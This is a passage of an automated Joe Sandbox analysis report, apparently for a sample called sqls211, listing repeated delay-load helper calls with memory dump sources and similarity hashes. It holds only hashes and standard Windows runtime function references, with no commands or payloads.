                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                                                                            • Instruction ID: f97fd66f695532eb05434c82143a4933a4fa1caa00f77ffb861a854a69bf9435
                                                                                                            • Opcode Fuzzy Hash: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                                                                            • Instruction Fuzzy Hash: 3FB012E135D284BC3188720A2D02C3B010DC0C0B28330413FFA05C83C1D8406C443432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                                                                            • Instruction ID: 54d91ef4607e92cc17a9debe6fed04dbb040e2aab48591c3f293e00d43f20e13
                                                                                                            • Opcode Fuzzy Hash: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                                                                            • Instruction Fuzzy Hash: 1AB012D135C154AC3144711A2D02C3B014CC0C1B28330803FFF05C83C1D840AC003432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                                                                            • Instruction ID: 210b3209b2953e72bdbdd12cac448a4a65eb3f3fd426ae025972661f6a2b3680
                                                                                                            • Opcode Fuzzy Hash: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                                                                            • Instruction Fuzzy Hash: C3B012D136D184AC3148710A2D02C3B014DC4C0B28330403FFA06C83C1D8406C003432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                                                                            • Instruction ID: 68ad2d26d515abfb1113df245f46af68b0835b7b5727121a69d5c06e92129b8b
                                                                                                            • Opcode Fuzzy Hash: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                                                                            • Instruction Fuzzy Hash: 2FB012D135C244AC3144720A2E03C3B010CC0C0B28330803FFA09C83C1DC506D093432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                                                                            • Instruction ID: f8ebe13bf0437518e251044e75e4b4b1b74865359203979adcbfb7aa4e50f3a9
                                                                                                            • Opcode Fuzzy Hash: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                                                                            • Instruction Fuzzy Hash: FEB012D135C384BC3184720A2D02C3B010CC0C0B28330813FFA09C83C1D8406C443432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                                                                            • Instruction ID: 9112c38e77f2fb4c07a1a76bc15033dd5e2476c56a0965dca6cc3b7b70000c7e
                                                                                                            • Opcode Fuzzy Hash: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                                                                            • Instruction Fuzzy Hash: 8DB012E135C144BC3144710A2D02C3B010CC0C1F28330803FFF05C83C1D840AD003432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                                                                            • Instruction ID: 365084fa6e0ffa1b7dfce38b91089cf8a259de41ceb4874cd3a6bddbee0dc96b
                                                                                                            • Opcode Fuzzy Hash: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                                                                            • Instruction Fuzzy Hash: 52B012E135C284BC3184710A2D02C3B010CC0C0F28330413FFB05C83C1D8406D403432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                                                                            • Instruction ID: fcba007005f39ee154801e917e945b133638c910280025ad19bed176dec55e33
                                                                                                            • Opcode Fuzzy Hash: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                                                                            • Instruction Fuzzy Hash: 7DB012E135C144AC3144710B2D02C3B010CC0C0F28330403FFB05C83C1D8406D003432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                                                                            • Instruction ID: 04cbd5e43457d847bde3d88b7d63d3b2372b01470eb145ab9c97750e7810127d
                                                                                                            • Opcode Fuzzy Hash: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                                                                            • Instruction Fuzzy Hash: 08B012E135C144AC3144710A2E03C3B010CC0C0F28330403FFB05C83C1DC406E013432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                                                                            • Instruction ID: 0dd66c898d7a7d38e083d22871dabd9da1c95a6f9295d7440b493458543b6859
                                                                                                            • Opcode Fuzzy Hash: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                                                                            • Instruction Fuzzy Hash: 45B012E139C154BC3244B1092E02C37024CC5C0B14330C03FFB04C93C0D8404C042433
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                                                                            • Instruction ID: 0f9f964a9eaeead3f30d1b09614bf2daa097ae9cd16a2bb46b52704b6c9b14ef
                                                                                                            • Opcode Fuzzy Hash: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                                                                            • Instruction Fuzzy Hash: 2AB012E139C1547C324471092F02C37024CC4C0B14330C03FF704D93C0D8400C092433
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                                                                            • Instruction ID: 6aa3e0472f04e0bc3b12ce9d487fc5b8bf1f68f8a2c592f478a55009a72c2b3e
                                                                                                            • Opcode Fuzzy Hash: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                                                                            • Instruction Fuzzy Hash: 8AB012F139C054BC3244B1096E02C37024CC5C0F14330803FFB04C93C0D8444E002433
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                                                                            • Instruction ID: 51b04d439dc282cd60ec641f6f5472eaec988e42e98ea4f9f6030bf7e587a752
                                                                                                            • Opcode Fuzzy Hash: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                                                                            • Instruction Fuzzy Hash: BCB012C135C1587E3144B25A3D42C37011CC4C0B19330413FF604C93C0F8400C102432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                                                                            • Instruction ID: 026f5336c5e159d15af7b1c95a0cdd375be9ed83bc01ae4dc7e5b43bd6cbf941
                                                                                                            • Opcode Fuzzy Hash: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                                                                            • Instruction Fuzzy Hash: 20B012C175C1547C3144B15A7E43C37012CC4D0B19330423FF604C93C0FC400D112432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                                                                            • Instruction ID: d63a90cb83e5a700623de1a181942a44534b7fa04c82cc622b8972d2e63a435b
                                                                                                            • Opcode Fuzzy Hash: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                                                                            • Instruction Fuzzy Hash: 95B012C135C2547C3184B15A7D43C37012CC4D0B19330423FF604C93C0F8400C502432
                                                                                                            APIs
